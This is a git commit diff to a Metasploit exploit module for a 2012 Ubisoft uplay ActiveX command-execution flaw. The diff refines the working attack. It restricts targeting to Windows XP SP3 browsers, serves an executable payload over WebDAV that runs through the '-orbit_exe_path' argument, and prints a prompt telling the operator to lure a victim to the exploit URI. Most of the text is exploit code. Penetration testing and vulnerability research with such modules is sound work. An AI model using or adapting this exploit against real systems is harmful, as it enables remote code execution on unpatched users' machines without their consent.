Lots of changes before commit.

2012-08-06 11:54:08 -05:00 · 2012-08-06 11:54:08 -05:00 · 69ff9e7c1c
parent 25b2b2de68
commit 69ff9e7c1c
1 changed files with 30 additions and 31 deletions
--- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@ -17,25 +13,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::HttpServer::HTML
 	include Msf::Exploit::EXE

-	include Msf::Exploit::Remote::BrowserAutopwn
-	autopwn_info({
-		:os_name    => OperatingSystems::WINDOWS,
-		:javascript => true,
-		:rank       => NormalRanking
-		#:classid    => "{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}" # Does not get registered in IE properly?
-	})
-
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Ubisoft uplay Active X Control Arbitrary Code Execution',
+			'Name'           => 'Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution',
 			'Description'    => %q{
 				The uplay ActiveX component allows an attacker to execute any command line action.
-					User must sign in, unless auto-sign in is enabled and uplay must not already be running.
-
-					The exploit will request an exe payload over WebDAV, and must be running on port 80.
-
-					Tested in Win XP, does not appear to work in Win7.
-
+				User must sign in, unless auto-sign in is enabled and uplay must not already be
+				running.  Due to the way the malicious executable is served (WebDAV), the module
+				must be run on port 80, so please make sure you have enough privilege to do that.
 				Ubisoft released patch 2.04 as of Mon 20th July.
 			},
 			'License'        => MSF_LICENSE,
@ -46,15 +31,15 @@ class Metasploit3 < Msf::Exploit::Remote
 					'phillips321 <phillips321[at]phillips321.co.uk>',
 					'Richard Hicks <scriptmonkeyblog[at]gmail.com>'
 				],
-			'Version'        => '$Revision$',
 			'References'     =>
 				[
+					[ 'OSVDB', 'http://osvdb.org/show/osvdb/84402'],
 					[ 'URL', 'http://seclists.org/fulldisclosure/2012/Jul/375']
 				],
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Automatic', { } ],
+					[ 'Automatic', { } ]
 				],
 			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Jul 29 2012'))
@ -66,11 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			OptString.new('EXPLOITPATH', [false, "The URI to use for the exploit"])
 		], self.class)

-		deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH') # WebDAV does not support SSL and must run over port 80.
-
-	@basename = rand_text_alpha(8)
-	@share_name = rand_text_alpha(8)
-	@extensions = "exe"
+		# WebDAV does not support SSL and must run over port 80.
+		deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH')
 	end

 	def autofilter
@ -81,6 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		use_zlib
 	end

+	def is_exploitable?(req)
+		# Only engage Win XP SP3 targets
+		req.headers['User-Agent'] =~ /NT 5\.1/
+	end
+
 	def on_request_uri(cli, request)
 		case request.method
 		when 'OPTIONS'
@ -89,7 +76,15 @@ class Metasploit3 < Msf::Exploit::Remote
 			process_propfind(cli, request)
 		when 'GET'
 			if request.uri_parts['Resource'].include? @uplay_uri
+				if is_exploitable?(request)
 					prompt_uplay(cli, request)
+				else
+					print_error("Not the target we want, will not engage.")
+					resp = create_response(404, "Not Found")
+					resp.body = ""
+					resp['Content-Type'] = 'text/html'
+					cli.send_response(resp)
+				end
 			else
 				process_get(cli, request)
 			end
@ -409,6 +404,10 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
 	end

 	def exploit
+		@basename = rand_text_alpha(8)
+		@share_name = rand_text_alpha(8)
+		@extensions = "exe"
+
 		if datastore['EXPLOITPATH']
 			@uplay_uri = datastore['EXPLOITPATH']
 		else
@ -424,7 +423,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
 		end

 		vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe")
-		print_status("Exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}")
+		print_good("Please let your victim browse to this exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}")

 		super
 	end